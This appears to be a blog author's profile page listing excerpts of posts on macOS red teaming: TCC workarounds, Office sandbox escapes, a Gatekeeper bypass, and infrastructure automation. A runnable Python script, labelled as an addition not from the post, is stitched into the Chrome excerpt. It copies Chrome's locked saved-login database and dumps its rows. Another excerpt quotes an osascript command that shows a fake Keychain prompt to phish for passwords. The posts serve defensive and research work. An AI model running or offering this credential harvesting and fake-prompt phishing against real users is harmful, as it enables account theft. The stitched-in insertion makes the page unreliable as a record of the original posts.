This post builds on content from ’s prior blog post “Acting Red — Seeing Blue” (link). Specifically, I automated HELK server standup using Terraform to deploy a HELK server in Digital Ocean with appropriate specs and with firewall rules restricting access to the server. And of course is the brains behind HELK, so shoutout to Roberto for the great work!

HELK Server

Preparation Steps

  1. You will need a Digital Ocean account if you do not have one already. Once created, you will need to create an ssh key pair and then upload the public…


This blog post will take a look at some simple basics around what macOS privacy controls (Transparency, Consent, and Control, a.k.a. TCC) are and how red team operations on macOS hosts can still be effective despite these controls. This blog post will not cover any TCC bypasses but will instead look at working around TCC controls. If you are more interested in TCC bypasses, @theevilbit and @_r3ggi have done some great research in this area, have written several blog posts, and are also giving a talk at Black Hat 2021 on this subject.

I will (at a high level) talk…


This blog will take a quick look at Chrome files on macOS that are not protected by TCC and do not require root to read. Because these files are not protected by TCC, any non-sandboxed macOS payload can access them without needing TCC permissions.

Chrome Files Not Protected by TCC

Note: Some Chrome files are locked while Chrome is running. However, since these files are not protected by TCC, you can simply copy a locked file to another location and read the copy there.

  • ~/Library/Application Support/Google/Chrome/Default/Login Data (sqlite3 database)
    — interesting tables:
    —…
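As an added example (not code from the post), here is the copy-then-read approach the note above describes, in Python. The Chrome path is the one listed above; the `logins` table, its rows and the lock-holding connection are a constructed stand-in built by the script itself so it runs offline, not a dump of Chrome's real schema. The point it shows is that SQLite's file locks are advisory, so a locked database still copies cleanly, and the snapshot (with any journal/WAL side files) can be opened and queried normally:

```python
import os
import shutil
import sqlite3
import tempfile

# Path from the post: Chrome's saved-login database on macOS (not TCC-protected).
CHROME_LOGIN_DATA = os.path.expanduser(
    "~/Library/Application Support/Google/Chrome/Default/Login Data"
)


def snapshot_sqlite(src_path):
    """Copy a SQLite database that another process may be holding locked.

    SQLite locks are advisory byte-range locks, so a plain file copy still
    succeeds while Chrome has the database open. Companion journal/WAL/shm
    files are copied alongside so the snapshot stays consistent.
    Returns the path of the copy, placed in a fresh temp directory.
    """
    tmpdir = tempfile.mkdtemp(prefix="snap-")
    dst = os.path.join(tmpdir, os.path.basename(src_path))
    shutil.copy2(src_path, dst)
    for suffix in ("-journal", "-wal", "-shm"):
        side = src_path + suffix
        if os.path.exists(side):
            shutil.copy2(side, dst + suffix)
    return dst


def list_tables(db_path):
    """Return the table names in a SQLite file (works on the snapshot)."""
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute(
            "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"
        ).fetchall()
    finally:
        con.close()
    return [r[0] for r in rows]


def dump_table(db_path, table):
    """Return (column_names, rows) for one table; the identifier is quoted."""
    ident = '"' + table.replace('"', '""') + '"'
    con = sqlite3.connect(db_path)
    try:
        cur = con.execute("SELECT * FROM " + ident)
        cols = [d[0] for d in cur.description]
        rows = cur.fetchall()
    finally:
        con.close()
    return cols, rows


def build_constructed_login_data(path):
    """Create a stand-in database (constructed here, not Chrome's real schema)
    and return a connection that keeps it exclusively locked, the way a
    running Chrome blocks direct readers."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, "
                "password_value BLOB)")
    con.execute("INSERT INTO logins VALUES (?, ?, ?)",
                ("https://example.test/login", "alice", b"\x01\x02\x03"))
    con.commit()
    # EXCLUSIVE locking mode keeps the file lock after the next write, so other
    # connections get 'database is locked' until this connection closes.
    con.execute("PRAGMA locking_mode=EXCLUSIVE")
    con.execute("INSERT INTO logins VALUES (?, ?, ?)",
                ("https://example.test/admin", "bob", b"\x04\x05"))
    con.commit()
    return con


def demo(path=None):
    """Show that a direct read fails while copy-then-read succeeds.
    Returns (direct_read_was_locked, tables_in_snapshot, row_count)."""
    db = path or os.path.join(tempfile.mkdtemp(prefix="chrome-demo-"), "Login Data")
    holder = build_constructed_login_data(db)
    try:
        try:
            sqlite3.connect(db, timeout=0.1).execute("SELECT * FROM logins").fetchall()
            locked = False
        except sqlite3.OperationalError:  # 'database is locked'
            locked = True
        snap = snapshot_sqlite(db)
        tables = list_tables(snap)
        _, rows = dump_table(snap, "logins")
    finally:
        holder.close()
    return locked, tables, len(rows)


if __name__ == "__main__":
    print(demo())
```

Against a real profile you would call `snapshot_sqlite(CHROME_LOGIN_DATA)` and then `list_tables` on the returned path; the stored `password_value` column is still encrypted with a key held in the login keychain, so reading the file only gets you the ciphertext and the surrounding metadata.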


This blog will look at some observations about what is still possible from the MS Office sandbox on macOS. This is a combination of insight from others as well as some tests that I have attempted. Hopefully this will help readers better understand what is possible via remote sandboxed access gained through an MS Office macro.

Binaries

What are some macOS binaries that can be executed from sandboxed MS Office macros? Below are some:

  • osascript: You can prompt the user for credentials (ex: osascript -e 'set popup to display dialog \"Keychain Access wants to use the login keychain\"…


This is a quick follow-up to my previous blog where I discussed how I found the bug behind CVE-2021-30657 (link to previous blog, which also contains a link to Patrick Wardle’s deep dive into the bug itself: https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508). In this blog post I will share another very basic method that abuses this bug on unpatched versions of macOS (i.e., versions of Big Sur prior to 11.3 and Catalina 10.15.7 builds before Catalina Update 2021-002). Apple’s fix DOES prevent this method from working on patched versions of macOS. The Apple Security Advisory for macOS 11.3 can be found at: https://support.apple.com/en-us/HT212325.


This post will briefly discuss how a bug that I uncovered in macOS Catalina 10.15 (specifically tested on 10.15.7) and in macOS Big Sur before Big Sur 11.3 allows an attacker to very easily craft a macOS payload that is not checked by Gatekeeper. This payload can be used in phishing, and all the victim has to do is double-click to open the .dmg and double-click the fake app inside of the .dmg — no pop-ups or warnings from macOS are generated. Therefore, if you are reading this, please update to Big Sur 11.3 or Catalina update 2021-002…


I currently work as an offensive security engineer in the tech industry and have been in security for 17 years now (I cannot believe it has been this long!). However, I have worked in various capacities across different security functions throughout my security career. I have learned that there is no “right path” into security and that each person’s journey provides a unique perspective on things. In this post, I will highlight my journey and things I have learned along the way.

Chapter 1

The first 5 years of my career.

I began my professional experience as an IT Auditor…


The areas of responsibility for internal red teams span many different aspects, ranging from tool development to operations planning and execution to infrastructure standup and maintenance and everything in between. As an internal red teamer, I believe there are opportunities for automation that will allow teams to operate more efficiently by handling some of the routine and repetitive tasks. I do not believe that red team functions as a whole can be automated — there are too many factors that require human intervention, insight and experience. This article will instead look at some practical examples of how red teams can automate infrastructure standup.

Infrastructure Needs


In this blog post, I will skip over talking about what red teaming is and discuss some common approaches to red teaming often used by internal corporate red teams. I will briefly mention some of the approaches and discuss some considerations of each, and hopefully this will help internal red teams as they figure out and plan how they want to approach red teaming. Also of note: red teams often perform other tasks that are not listed in this blog; this blog just highlights different approaches specifically around red team operations.

Approach 1: A Long Running Operation

In this approach, an internal red team will…


I recently started a side project looking at what python-based post exploitation making Objective-C calls looks like on modern macOS systems (Catalina and Big Sur). spearheaded python-based post exploitation on macOS years ago with his EmPyre project. However, a lot has changed on macOS since then, so this became a fun side project for me. Apple has stated plans to remove scripting runtimes from base OS installs; however, python 2 in particular still continues to hang around. In fact, the initial release of Big Sur includes python 2 in its base OS install (yes you read…

Cedric Owens

Red teamer with blue team roots🤓👨🏽‍💻 Twitter: @cedowens
